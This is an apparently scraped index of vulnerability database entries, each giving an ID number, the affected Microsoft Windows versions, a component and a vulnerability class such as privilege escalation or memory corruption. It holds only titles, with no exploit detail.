DHCP memory corruption [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136309] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136277] Microsoft Windows 7 SP1/2008 R2 SP1 Speech API memory corruption [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133378] Microsoft Windows 7/8/10/Vista Contact File cross site scripting [133237] Microsoft Windows Admin Center privilege escalation [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131616] Microsoft Windows REG File Message weak authentication [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130819] Microsoft Windows Kernel information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129167] Microsoft Windows VCF File memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [125101] Microsoft Windows Graphics Component memory corruption [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [117331] Microsoft Windows Host Compute Host Compute Service Shim privilege escalation [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114550] Microsoft Windows Kernel information disclosure [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113241] Microsoft Windows up to Server 2016 Common Log File System Driver privilege escalation [113240] Microsoft Windows 10/Server 1709/Server 2016 AppContainer privilege escalation [113238] Microsoft Windows 10 1709/Server 1709 Named Pipe File System privilege escalation [113230] Microsoft Windows up to Server 2016 Scripting Engine information disclosure [113229] Microsoft Windows up to Server 2016 StructuredQuery memory corruption [111358] Microsoft Windows up to Server 2016 IPsec memory corruption [111347] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Color Management Icm32.dll information disclosure [110547] Microsoft Windows up to Server 2016 its:/ Protocol information disclosure [110531] Microsoft Windows 10/Server 2016 Device Guard 7PK Security Features [110522] Microsoft Windows up to Server 2016 RRAS privilege escalation [110350] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [110318] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [109360] Microsoft Windows up to Server 2016 Windows Search Data Processing Error [107920] Microsoft Windows up to Vista SP2 Graphics information disclosure [107759] Microsoft Windows up to Server 2016 SMB privilege escalation [107757] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107756] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [107753] Microsoft Windows 10/Server 2016 SMB Data Processing Error [107744] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [107740] Microsoft Windows up to Server 2016 Graphics privilege escalation [107739] Microsoft Windows up to Server 2016 Graphics privilege escalation [107738] Microsoft Windows up to Server 2016 Search information disclosure [107734] Microsoft Windows 10/Server 2016 SMB privilege escalation [107731] Microsoft Windows 7 SP1 Shell memory corruption [107730] Microsoft Windows up to Server 2016 Search Remote privilege escalation [107724] Microsoft Windows up to Server 2016 Text Services Framework privilege escalation [107723] Microsoft Windows up to Server 2016 SMB information disclosure [106523] Microsoft Windows up to Server 2016 PDF Library memory corruption [106516] Microsoft Windows up to Server 2016 PDF Library memory corruption [106498] Microsoft Windows up to Server 2016 Shell privilege escalation [106497] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Uniscribe memory corruption [106496] Microsoft Windows up to Server 2016 Uniscribe information disclosure [106495] Microsoft Windows up to Server 2012 R2 Uniscribe memory corruption [106492] Microsoft Windows Server 2012/Server 2012 R2/Server 2016 DHCP Service memory corruption [106489] Microsoft Windows up to Server 2016 Graphics Win32k win32k!fsc_CalcGrayRow information disclosure [106472] Microsoft Windows up to Server 2016 Bluetooth Driver Object BlueBorne privilege escalation [106454] Microsoft Windows up to Server 2016 Windows NetBT Session Services race condition [105051] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Font Library Data Processing Error [105049] Microsoft Windows 10 1703 Remote Desktop Protocol Data Processing Error [105017] Microsoft Windows up to Server 2016 Error Reporting privilege escalation [105013] Microsoft Windows 10 1607/10 1703/Server 2016 Hyper-V privilege escalation [105011] Microsoft Windows up to Server 2016 Windows Search memory corruption [105010] Microsoft Windows up to Server 2016 Win32k privilege escalation [105009] Microsoft Windows up to Server 2016 Input Method Editor Data Processing Error [104990] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [104989] Microsoft Windows up to Server 2016 NetBIOS Data Processing Error [104982] Microsoft Windows up to XP SMBv1 Smbloris denial of service [103446] Microsoft Windows up to Server 2016 Search privilege escalation [103445] Microsoft 